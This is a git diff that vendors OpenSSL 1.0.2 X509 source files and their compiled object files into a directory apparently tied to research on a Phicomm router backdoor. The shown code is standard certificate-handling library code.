+    if (!b->canon_enc || b->modified) {
+        ret = i2d_X509_NAME((X509_NAME *)b, NULL);
+        if (ret < 0)
+            return -2;
+    }
+
+    ret = a->canon_enclen - b->canon_enclen;
+
+    if (ret)
+        return ret;
+
+    return memcmp(a->canon_enc, b->canon_enc, a->canon_enclen);
+
+}
+
+unsigned long X509_NAME_hash(X509_NAME *x)
+{
+    unsigned long ret = 0;
+    unsigned char md[SHA_DIGEST_LENGTH];
+
+    /* Make sure X509_NAME structure contains valid cached encoding */
+    i2d_X509_NAME(x, NULL);
+    if (!EVP_Digest(x->canon_enc, x->canon_enclen, md, NULL, EVP_sha1(),
+                    NULL))
+        return 0;
+
+    ret = (((unsigned long)md[0]) | ((unsigned long)md[1] << 8L) |
+           ((unsigned long)md[2] << 16L) | ((unsigned long)md[3] << 24L)
+        ) & 0xffffffffL;
+    return (ret);
+}
+
+#ifndef OPENSSL_NO_MD5
+/*
+ * I now DER encode the name and hash it.  Since I cache the DER encoding,
+ * this is reasonably efficient.
+ */
+
+unsigned long X509_NAME_hash_old(X509_NAME *x)
+{
+    EVP_MD_CTX md_ctx;
+    unsigned long ret = 0;
+    unsigned char md[16];
+
+    /* Make sure X509_NAME structure contains valid cached encoding */
+    i2d_X509_NAME(x, NULL);
+    EVP_MD_CTX_init(&md_ctx);
+    EVP_MD_CTX_set_flags(&md_ctx, EVP_MD_CTX_FLAG_NON_FIPS_ALLOW);
+    if (EVP_DigestInit_ex(&md_ctx, EVP_md5(), NULL)
+        && EVP_DigestUpdate(&md_ctx, x->bytes->data, x->bytes->length)
+        && EVP_DigestFinal_ex(&md_ctx, md, NULL))
+        ret = (((unsigned long)md[0]) | ((unsigned long)md[1] << 8L) |
+               ((unsigned long)md[2] << 16L) | ((unsigned long)md[3] << 24L)
+            ) & 0xffffffffL;
+    EVP_MD_CTX_cleanup(&md_ctx);
+
+    return (ret);
+}
+#endif
+
+/* Search a stack of X509 for a match */
+X509 *X509_find_by_issuer_and_serial(STACK_OF(X509) *sk, X509_NAME *name,
+                                     ASN1_INTEGER *serial)
+{
+    int i;
+    X509_CINF cinf;
+    X509 x, *x509 = NULL;
+
+    if (!sk)
+        return NULL;
+
+    x.cert_info = &cinf;
+    cinf.serialNumber = serial;
+    cinf.issuer = name;
+
+    for (i = 0; i < sk_X509_num(sk); i++) {
+        x509 = sk_X509_value(sk, i);
+        if (X509_issuer_and_serial_cmp(x509, &x) == 0)
+            return (x509);
+    }
+    return (NULL);
+}
+
+X509 *X509_find_by_subject(STACK_OF(X509) *sk, X509_NAME *name)
+{
+    X509 *x509;
+    int i;
+
+    for (i = 0; i < sk_X509_num(sk); i++) {
+        x509 = sk_X509_value(sk, i);
+        if (X509_NAME_cmp(X509_get_subject_name(x509), name) == 0)
+            return (x509);
+    }
+    return (NULL);
+}
+
+EVP_PKEY *X509_get_pubkey(X509 *x)
+{
+    if ((x == NULL) || (x->cert_info == NULL))
+        return (NULL);
+    return (X509_PUBKEY_get(x->cert_info->key));
+}
+
+ASN1_BIT_STRING *X509_get0_pubkey_bitstr(const X509 *x)
+{
+    if (!x)
+        return NULL;
+    return x->cert_info->key->public_key;
+}
+
+int X509_check_private_key(X509 *x, EVP_PKEY *k)
+{
+    EVP_PKEY *xk;
+    int ret;
+
+    xk = X509_get_pubkey(x);
+
+    if (xk)
+        ret = EVP_PKEY_cmp(xk, k);
+    else
+        ret = -2;
+
+    switch (ret) {
+    case 1:
+        break;
+    case 0:
+        X509err(X509_F_X509_CHECK_PRIVATE_KEY, X509_R_KEY_VALUES_MISMATCH);
+        break;
+    case -1:
+        X509err(X509_F_X509_CHECK_PRIVATE_KEY, X509_R_KEY_TYPE_MISMATCH);
+        break;
+    case -2:
+        X509err(X509_F_X509_CHECK_PRIVATE_KEY, X509_R_UNKNOWN_KEY_TYPE);
+    }
+    if (xk)
+        EVP_PKEY_free(xk);
+    if (ret > 0)
+        return 1;
+    return 0;
+}
+
+/*
+ * Check a suite B algorithm is permitted: pass in a public key and the NID
+ * of its signature (or 0 if no signature). The pflags is a pointer to a
+ * flags field which must contain the suite B verification flags.
+ */
+
+#ifndef OPENSSL_NO_EC
+
+static int check_suite_b(EVP_PKEY *pkey, int sign_nid, unsigned long *pflags)
+{
+    const EC_GROUP *grp = NULL;
+    int curve_nid;
+    if (pkey && pkey->type == EVP_PKEY_EC)
+        grp = EC_KEY_get0_group(pkey->pkey.ec);
+    if (!grp)
+        return X509_V_ERR_SUITE_B_INVALID_ALGORITHM;
+    curve_nid = EC_GROUP_get_curve_name(grp);
+    /* Check curve is consistent with LOS */
+    if (curve_nid == NID_secp384r1) { /* P-384 */
+        /*
+         * Check signature algorithm is consistent with curve.
+         */
+        if (sign_nid != -1 && sign_nid != NID_ecdsa_with_SHA384)
+            return X509_V_ERR_SUITE_B_INVALID_SIGNATURE_ALGORITHM;
+        if (!(*pflags & X509_V_FLAG_SUITEB_192_LOS))
+            return X509_V_ERR_SUITE_B_LOS_NOT_ALLOWED;
+        /* If we encounter P-384 we cannot use P-256 later */
+        *pflags &= ~X509_V_FLAG_SUITEB_128_LOS_ONLY;
+    } else if (curve_nid == NID_X9_62_prime256v1) { /* P-256 */
+        if (sign_nid != -1 && sign_nid != NID_ecdsa_with_SHA256)
+            return X509_V_ERR_SUITE_B_INVALID_SIGNATURE_ALGORITHM;
+        if (!(*pflags & X509_V_FLAG_SUITEB_128_LOS_ONLY))
+            return X509_V_ERR_SUITE_B_LOS_NOT_ALLOWED;
+    } else
+        return X509_V_ERR_SUITE_B_INVALID_CURVE;
+
+    return X509_V_OK;
+}
+
+int X509_chain_check_suiteb(int *perror_depth, X509 *x, STACK_OF(X509) *chain,
+                            unsigned long flags)
+{
+    int rv, i, sign_nid;
+    EVP_PKEY *pk = NULL;
+    unsigned long tflags;
+    if (!(flags & X509_V_FLAG_SUITEB_128_LOS))
+        return X509_V_OK;
+    tflags = flags;
+    /* If no EE certificate passed in must be first in chain */
+    if (x == NULL) {
+        x = sk_X509_value(chain, 0);
+        i = 1;
+    } else
+        i = 0;
+
+    if (X509_get_version(x) != 2) {
+        rv = X509_V_ERR_SUITE_B_INVALID_VERSION;
+        /* Correct error depth */
+        i = 0;
+        goto end;
+    }
+
+    pk = X509_get_pubkey(x);
+    /* Check EE key only */
+    rv = check_suite_b(pk, -1, &tflags);
+    if (rv != X509_V_OK) {
+        /* Correct error depth */
+        i = 0;
+        goto end;
+    }
+    for (; i < sk_X509_num(chain); i++) {
+        sign_nid = X509_get_signature_nid(x);
+        x = sk_X509_value(chain, i);
+        if (X509_get_version(x) != 2) {
+            rv = X509_V_ERR_SUITE_B_INVALID_VERSION;
+            goto end;
+        }
+        EVP_PKEY_free(pk);
+        pk = X509_get_pubkey(x);
+        rv = check_suite_b(pk, sign_nid, &tflags);
+        if (rv != X509_V_OK)
+            goto end;
+    }
+
+    /* Final check: root CA signature */
+    rv = check_suite_b(pk, X509_get_signature_nid(x), &tflags);
+ end:
+    if (pk)
+        EVP_PKEY_free(pk);
+    if (rv != X509_V_OK) {
+        /* Invalid signature or LOS errors are for previous cert */
+        if ((rv == X509_V_ERR_SUITE_B_INVALID_SIGNATURE_ALGORITHM
+             || rv == X509_V_ERR_SUITE_B_LOS_NOT_ALLOWED) && i)
+            i--;
+        /*
+         * If we have LOS error and flags changed then we are signing P-384
+         * with P-256. Use more meaninggul error.
+         */
+        if (rv == X509_V_ERR_SUITE_B_LOS_NOT_ALLOWED && flags != tflags)
+            rv = X509_V_ERR_SUITE_B_CANNOT_SIGN_P_384_WITH_P_256;
+        if (perror_depth)
+            *perror_depth = i;
+    }
+    return rv;
+}
+
+int X509_CRL_check_suiteb(X509_CRL *crl, EVP_PKEY *pk, unsigned long flags)
+{
+    int sign_nid;
+    if (!(flags & X509_V_FLAG_SUITEB_128_LOS))
+        return X509_V_OK;
+    sign_nid = OBJ_obj2nid(crl->crl->sig_alg->algorithm);
+    return check_suite_b(pk, sign_nid, &flags);
+}
+
+#else
+int X509_chain_check_suiteb(int *perror_depth, X509 *x, STACK_OF(X509) *chain,
+                            unsigned long flags)
+{
+    return 0;
+}
+
+int X509_CRL_check_suiteb(X509_CRL *crl, EVP_PKEY *pk, unsigned long flags)
+{
+    return 0;
+}
+
+#endif
+/*
+ * Not strictly speaking an "up_ref" as a STACK doesn't have a reference
+ * count but it has the same effect by duping the STACK and upping the ref of
+ * each X509 structure.
+ */
+STACK_OF(X509) *X509_chain_up_ref(STACK_OF(X509) *chain)
+{
+    STACK_OF(X509) *ret;
+    int i;
+    ret = sk_X509_dup(chain);
+    for (i = 0; i < sk_X509_num(ret); i++) {
+        X509 *x = sk_X509_value(ret, i);
+        CRYPTO_add(&x->references, 1, CRYPTO_LOCK_X509);
+    }
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_cmp.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_cmp.o
new file mode 100644
index 0000000000000000000000000000000000000000..2776c30c45fb975638f4341116860d55bc4f7808
GIT binary patch
literal 7680
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_d2.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_d2.c
new file mode 100644
index 0000000..50ca2a6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_d2.c
@@ -0,0 +1,109 @@
+/* crypto/x509/x509_d2.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/crypto.h>
+#include <openssl/x509.h>
+
+#ifndef OPENSSL_NO_STDIO
+int X509_STORE_set_default_paths(X509_STORE *ctx)
+{
+    X509_LOOKUP *lookup;
+
+    lookup = X509_STORE_add_lookup(ctx, X509_LOOKUP_file());
+    if (lookup == NULL)
+        return (0);
+    X509_LOOKUP_load_file(lookup, NULL, X509_FILETYPE_DEFAULT);
+
+    lookup = X509_STORE_add_lookup(ctx, X509_LOOKUP_hash_dir());
+    if (lookup == NULL)
+        return (0);
+    X509_LOOKUP_add_dir(lookup, NULL, X509_FILETYPE_DEFAULT);
+
+    /* clear any errors */
+    ERR_clear_error();
+
+    return (1);
+}
+
+int X509_STORE_load_locations(X509_STORE *ctx, const char *file,
+                              const char *path)
+{
+    X509_LOOKUP *lookup;
+
+    if (file != NULL) {
+        lookup = X509_STORE_add_lookup(ctx, X509_LOOKUP_file());
+        if (lookup == NULL)
+            return (0);
+        if (X509_LOOKUP_load_file(lookup, file, X509_FILETYPE_PEM) != 1)
+            return (0);
+    }
+    if (path != NULL) {
+        lookup = X509_STORE_add_lookup(ctx, X509_LOOKUP_hash_dir());
+        if (lookup == NULL)
+            return (0);
+        if (X509_LOOKUP_add_dir(lookup, path, X509_FILETYPE_PEM) != 1)
+            return (0);
+    }
+    if ((path == NULL) && (file == NULL))
+        return (0);
+    return (1);
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_d2.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_d2.o
new file mode 100644
index 0000000000000000000000000000000000000000..e0155de439f0898359100c6a9445e1496fca04dd
GIT binary patch
literal 2400
zcmbW1&ubGw6vrn?f2nN}#Y3SYIY~ubl3KAXQku3&S51wy4HUF&x5?JjZnJTJNb5lb
zO<_@_2NlJC!i%CFO0a0_K@jnzH}xO{5h;j>Qs3L`G?VS-(l1Qr&1c?w^D;9#*J6pd
z*W)2n9@0xHBT5MgHB{_A%j_d9q?xP-_Ww!o=D%;qc=HEuzAl@EqEQzqmWFwAH5Ms8
z_rY}J{W7Mu=C}Bpt9+rTzh!*ARld(KbYcb9i;kT%Kj5OHyt&R7ei@C!g|9|;Y1Tcd
zRmV6c#uU8yu~Nmxn(?Ld(mhOnLqihg=jF{}Hr4`ni=_s>@F{Sw7<gJdHxWI*LWTwg
zdP41~DI=#Fp>FOd7d{d>Zdk*})s8S1?mSq=P=Td7_zgm<hc<L3MIe6>8SWEmZ@D9$
zD<i}+AM~^}H#RLn{jI?F*>id9WB%Zx*L%_5L`XXfyX?99*vI|B+ulKc>!NSaAG%TJ
zz3Fd_`h)%GTT8e_b>!!U+q}>9W?;><>gp&TWO9>_FqesO@R3GlR55+Ty<nfUdlf&l
zc0t?2)M@PzFx(s5Z>M?zxbb8SF4f?dYw%k&_#@z0C#}yqFJNT;Sh!orbZ}`hj@IZ{
zawH~bk}hPVY0;2%AusA#jR-@DWPdavB;)bX*qAUD?N7vna!4YXJe@i#OwY&?n?uZG
z1X)pLjeM0`T36*NkQKG8keN|QY-B`8%aW)HlBy~yn@d(iOqLe)86~G-**owDgeQ(?
z@OPsudXJGeGrSXQ6!I2m)V~`c2)Q2`<%0-8&ODPA-I@o_35EUvXf)3qgdpT>oewR#
zHUA5Svvs~=I9umChO__oJHy#LA)Dj-f{p5gZBS0{3E{MbIbEEBURTR~mRhPLi<~aa
z>x9dQx=6SwO(R@dnVXYxz;cQ%aq!k0(R49AYmYDF3@)!Kc}dk52xn!Gvcj|~&e0vD
z6>YB%K^VR%&M&?X7^(p$899ce4d(Ey`WPQHd4!-YJ76c+XwsJg-$~Q~Xvm!}RNT1`
zI)j|}Ffh!y-S~)|GYmZ|y8a;+f=$<_eGkJ}*Gtrag)Y9QfZ?mk-YpE7x8p-NU_|$i
zqA4)Y)fxZ5j-RBCcJGXz0Pc2v*XzpxbYJlNFqX#C^K)ApBY)fL(>m~5#y7|rkIZ>?
efXI>!pWuLzopzJ#2Foq}v0cBs=~*_M@&5rCW?V)9

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_def.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_def.c
new file mode 100644
index 0000000..25c5537
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_def.c
@@ -0,0 +1,92 @@
+/* crypto/x509/x509_def.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/crypto.h>
+#include <openssl/x509.h>
+
+const char *X509_get_default_private_dir(void)
+{
+    return (X509_PRIVATE_DIR);
+}
+
+const char *X509_get_default_cert_area(void)
+{
+    return (X509_CERT_AREA);
+}
+
+const char *X509_get_default_cert_dir(void)
+{
+    return (X509_CERT_DIR);
+}
+
+const char *X509_get_default_cert_file(void)
+{
+    return (X509_CERT_FILE);
+}
+
+const char *X509_get_default_cert_dir_env(void)
+{
+    return (X509_CERT_DIR_EVP);
+}
+
+const char *X509_get_default_cert_file_env(void)
+{
+    return (X509_CERT_FILE_EVP);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_def.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_def.o
new file mode 100644
index 0000000000000000000000000000000000000000..0809074b4557827b179056ea1564d8c65c446c9e
GIT binary patch
literal 2720
zcmb`I&1(}u6u@6hYooR`exO1{bEx81cayZGR73*lCj^nSg$hF0Y^F`<CL1@K(yC|=
z9=r&>>CvPAfEQ1KcTfHcf>-e-LY=q!UNf0)F2;eG_ug;bo86uFX7=TLVc}RT2HawB
zA37FOfYeY&&jo4@MqvbgoxbvW>CGULFa79d)vXKDY1_7Cu8M|Lc7$1U+rIEx=EG{u
zcI$O>)pebgS+?x0itBn4j%#l<Yxb7uHhr_{)wV5PK%eXM8*kde^IQLA6{9KYu(DDp
z<>!m5rMcx|$5>b{%mXau^LJA>*2?XM-%iaMlSX<XGt&;t%!_Q=NKf4iF(zj~_N45X
zsl^9ta17uxvbgNn&W8eGPm2)SNyf&8hZ6g;5HRL4%?*=8mX2U^5o|qzIT376V`Lr?
zSepaz^WeyY1o6nqMb2N@9Tg9DrJJD@4|XYvD~CXtjzdDRI%*tFbPUqMJq*rE*W8)F
z8ib`T3UGn=YmJW)|Elp6@r&9azD9gp<A~#MJeXC7ThchI>?h}bkvQ8d%fv6yBFvu?
zAJ_O>;(8r@Bz{lxhn?y4Y^fqP3>%C>K8-^Lhb#`0I85O%4eRK*DSULc+KykMtD#h>
zc}FMlyp}9aSUskC2W`|G(L1Ol8rwZ)F)*0MPvnY{=P{_3KL=quN8gY9r0mSED*Tkf
zZz~-4p8aPOKBDlv!bcUJQaC=F+Y~9tuycO7UYT?LA8Y=c|E9({|F1O8`3Ix5TlcN9
zl)e|rDr=r_EW;N&J{T3tx4<a3T3~oC8t9%eWQE|LLo}pI!}WzBufB<vFaIE9Z#LRS
